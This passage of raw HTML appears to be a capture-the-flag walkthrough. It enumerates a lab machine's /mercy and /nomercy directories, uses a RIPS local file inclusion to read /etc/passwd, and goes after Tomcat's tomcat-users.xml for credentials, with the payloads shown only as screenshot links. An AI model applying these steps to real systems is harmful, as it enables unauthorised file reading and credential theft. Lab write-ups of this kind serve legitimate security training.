/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now port 80 is working normally:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwxSw9L50S6hU5C56XslzeFBoIvX7_t0R-K5q0qH963Ou3oy-iXA6vOFJlwWlyWE8CWkdtCyOeeh0hLaaBXWfjzs0rwbHvxXYUXwLO88BrsHiv10osbiqIdgl3edgmNQdfhhzBMYfMRhyv/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;179&quot; data-original-width=&quot;808&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwxSw9L50S6hU5C56XslzeFBoIvX7_t0R-K5q0qH963Ou3oy-iXA6vOFJlwWlyWE8CWkdtCyOeeh0hLaaBXWfjzs0rwbHvxXYUXwLO88BrsHiv10osbiqIdgl3edgmNQdfhhzBMYfMRhyv/s16000/screenshot.28.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- From Nmap we learn that there is &lt;b&gt;robots.txt &lt;/b&gt;and two available directories: &lt;b&gt;/mercy&lt;/b&gt; and &lt;b&gt;/nomercy:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9P5Yg7XC54ep982Suldz6hQgy8evsTes9FQdHfsxiMWJ6-J48RPzi791_PCo2-5SMzTNMbUcz9rUAfS7Dj-6HJ_wX_3t-eD4gvsEy0tbrNqIRZdlMiRELKGlMqDTgpxAdtSL570yLfLe7/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;191&quot; data-original-width=&quot;392&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9P5Yg7XC54ep982Suldz6hQgy8evsTes9FQdHfsxiMWJ6-J48RPzi791_PCo2-5SMzTNMbUcz9rUAfS7Dj-6HJ_wX_3t-eD4gvsEy0tbrNqIRZdlMiRELKGlMqDTgpxAdtSL570yLfLe7/s16000/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing &lt;b&gt;/mercy:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBpWxCVAFd0AiVpJLIB773PD-YZnXNLA4MN1m0LZPoXojaW1yGeVX-ot6K2JWuVDZPmJZt_PmzLWODTsR5A2j_MGOOa_OucFyGE2KpMazwblybwIB9K8qrAbyW006ZtAKV-bjeHVAUtO4u/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;430&quot; data-original-width=&quot;727&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBpWxCVAFd0AiVpJLIB773PD-YZnXNLA4MN1m0LZPoXojaW1yGeVX-ot6K2JWuVDZPmJZt_PmzLWODTsR5A2j_MGOOa_OucFyGE2KpMazwblybwIB9K8qrAbyW006ZtAKV-bjeHVAUtO4u/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDDR7iyMy-nv_kDPfsaZbAa3-7BDZjcwYJy7hJM9mAhy0pjGIck4AXM94CKnYV1Qq6SCN7BORI93-vieSDYfp8cPOAl9wFwQ_fYg7ju5gKQikGm9R0CHYgYT2yDgyb3p9THKiRcJf1nFKD/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;805&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDDR7iyMy-nv_kDPfsaZbAa3-7BDZjcwYJy7hJM9mAhy0pjGIck4AXM94CKnYV1Qq6SCN7BORI93-vieSDYfp8cPOAl9wFwQ_fYg7ju5gKQikGm9R0CHYgYT2yDgyb3p9THKiRcJf1nFKD/s16000/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing &lt;b&gt;/nomercy&lt;/b&gt; we find &lt;b&gt;RIPS&lt;/b&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;a popular static code analysis tool to automatically detect vulnerabilities in PHP applications:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWgdAKRd5pkDOHkyxgz8bGende4VNGAVV37Z6HUj7kFRTcPIW3oc0754YlWF2L5YqXS4VsOQRMMXfAc2HqBOSR6OkcdB3r_fj7VhJLoHAKWYAhSAGsa5iHt2vD4ZV6E8pk1Hd8GATMOuY/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;889&quot; data-original-width=&quot;1895&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWgdAKRd5pkDOHkyxgz8bGende4VNGAVV37Z6HUj7kFRTcPIW3oc0754YlWF2L5YqXS4VsOQRMMXfAc2HqBOSR6OkcdB3r_fj7VhJLoHAKWYAhSAGsa5iHt2vD4ZV6E8pk1Hd8GATMOuY/s16000/screenshot.32.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for exploits related to RIPS we find that it is vulnerable to &lt;b&gt;Multiple Local File Inclusions&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg66k99eRmrU2xJovUZaMQcuqSWOz3r6VWdSMOhGj26Qhl5Fy3F2aQ86cWg-nvINoqiAg-fy4R52NvQc4XSdsxQWBAswZhAJeLjGrsOPlbKBL9AGCjGDamd4GCvsoM7IAEnSlmKUGuJ2CPY/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;341&quot; data-original-width=&quot;706&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg66k99eRmrU2xJovUZaMQcuqSWOz3r6VWdSMOhGj26Qhl5Fy3F2aQ86cWg-nvINoqiAg-fy4R52NvQc4XSdsxQWBAswZhAJeLjGrsOPlbKBL9AGCjGDamd4GCvsoM7IAEnSlmKUGuJ2CPY/s16000/screenshot.33.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc19H1cGJXcbBoC1piwPb8cELe6l_iCD0KIrY38vbdreWsDLJuNaME0UcwS-M7A3nqpRTvyLj1l8CdQAf7N5oWNx5oGb3JWphNBptjskhNpEox9XU46PafwtEgmewJfRjwUwj5F8sXZBHG/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;295&quot; data-original-width=&quot;269&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc19H1cGJXcbBoC1piwPb8cELe6l_iCD0KIrY38vbdreWsDLJuNaME0UcwS-M7A3nqpRTvyLj1l8CdQAf7N5oWNx5oGb3JWphNBptjskhNpEox9XU46PafwtEgmewJfRjwUwj5F8sXZBHG/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeJIJIzkjwdWkNaUgW8EgdC5xIgaRq70ls-41ccaqri09fn0w6_VxcWjD2kzETNB1MUIvT6vP6c4aaKFLfblABx6mzA3h7tdqpaE6gkGRZLlmqCQXBFY9JgCa9_mGsypYGqh8T2i7kyU1k/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;232&quot; data-original-width=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeJIJIzkjwdWkNaUgW8EgdC5xIgaRq70ls-41ccaqri09fn0w6_VxcWjD2kzETNB1MUIvT6vP6c4aaKFLfblABx6mzA3h7tdqpaE6gkGRZLlmqCQXBFY9JgCa9_mGsypYGqh8T2i7kyU1k/s16000/screenshot.35.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVS257A0OyBtXNuWrDeJHkDtKiAu-WeWsZX52_flkJgLaQ12eY4IHORKnS7r8ib-nsLhLOY4278Q2P7G2qtBtbfn0BsBoV1x8kyAxZWksc1hvVk2a_dBym3gdYkN4OKcmLq4BeW0BvURQ/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;440&quot; data-original-width=&quot;609&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpVS257A0OyBtXNuWrDeJHkDtKiAu-WeWsZX52_flkJgLaQ12eY4IHORKnS7r8ib-nsLhLOY4278Q2P7G2qtBtbfn0BsBoV1x8kyAxZWksc1hvVk2a_dBym3gdYkN4OKcmLq4BeW0BvURQ/s16000/screenshot.36.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Taking advantage of the vulnerability and reading &lt;b&gt;/etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-HCZQdSa32INdHmSMmyVWNnjQMvDnfV0ZW2yaHzOsjbjN2D1Rlc425ONh_vsOGkqom9ubaBe07xU4T-2xor3eoqIiLPxT-tYy5H0TiflM7f3s4mmQxHGwV9rJJl-7DMHBf6Sm8MHLYqqb/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;865&quot; data-original-width=&quot;810&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-HCZQdSa32INdHmSMmyVWNnjQMvDnfV0ZW2yaHzOsjbjN2D1Rlc425ONh_vsOGkqom9ubaBe07xU4T-2xor3eoqIiLPxT-tYy5H0TiflM7f3s4mmQxHGwV9rJJl-7DMHBf6Sm8MHLYqqb/s16000/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- From enumeration we know that there is a Tomcat server running:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6tDcZZ6Hhr4koP03uNgbLV1NOg9fDpK9zQayJPmYWZ4yNQLFmSa3Q8AkqGBwD_afvZJdKZ9EKhntiBTumwmgggT4H3omENCXUJ5eYECiuT2C1Dr2GrIVABFiluUSEnSoZeURN6mPYXuwY/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;25&quot; data-original-width=&quot;312&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6tDcZZ6Hhr4koP03uNgbLV1NOg9fDpK9zQayJPmYWZ4yNQLFmSa3Q8AkqGBwD_afvZJdKZ9EKhntiBTumwmgggT4H3omENCXUJ5eYECiuT2C1Dr2GrIVABFiluUSEnSoZeURN6mPYXuwY/s16000/screenshot.57.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSAW3o9HlH7bEmys2jqs2w-ohvRRlD090rIkj9sToDL1UhbXFcr54ciPPgmQVnwvr2rNCfX3mGlOh7XTW_CQo4OvFmPVL-M7eV5SFB6fIQd7WNX0lNoUy_x_1wk_-mpW2wv8no1duq2Zh/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;65&quot; data-original-width=&quot;749&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSAW3o9HlH7bEmys2jqs2w-ohvRRlD090rIkj9sToDL1UhbXFcr54ciPPgmQVnwvr2rNCfX3mGlOh7XTW_CQo4OvFmPVL-M7eV5SFB6fIQd7WNX0lNoUy_x_1wk_-mpW2wv8no1duq2Zh/s16000/screenshot.59.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwZ0RhnB43ch_G8mlH3Orm6UNSA_j3sChlytuoORJzO6OQFDlAd7E0-WbeAV3xlssadne8rlVRwKhSl4YeetFwOXOCvzi0lgxdiLQdxmuPuL15EiFSwnWcFBerjAoCY1qpBVlGhrm2XYx/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;759&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwZ0RhnB43ch_G8mlH3Orm6UNSA_j3sChlytuoORJzO6OQFDlAd7E0-WbeAV3xlssadne8rlVRwKhSl4YeetFwOXOCvzi0lgxdiLQdxmuPuL15EiFSwnWcFBerjAoCY1qpBVlGhrm2XYx/s16000/screenshot.58.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So let&#39;s try to access Tomcat&#39;s &lt;b&gt;tomcat-users.xml&lt;/b&gt;, where we can find interesting credentials:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9PLpWHHUyCxbMq5bmTOO_ZcFBowKA6acE15dU0LEEo4Hjns1izY_gTvYbo0xKtvFxhvQErkfzAfkkJkps9xUqgrjwVTq6-Q6LkGMOI-MEPwSW8NIuCSOU5uM73qiquEfboUM7SbNNXFRU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;832&quot; data-original-width=&quot;993&quot; 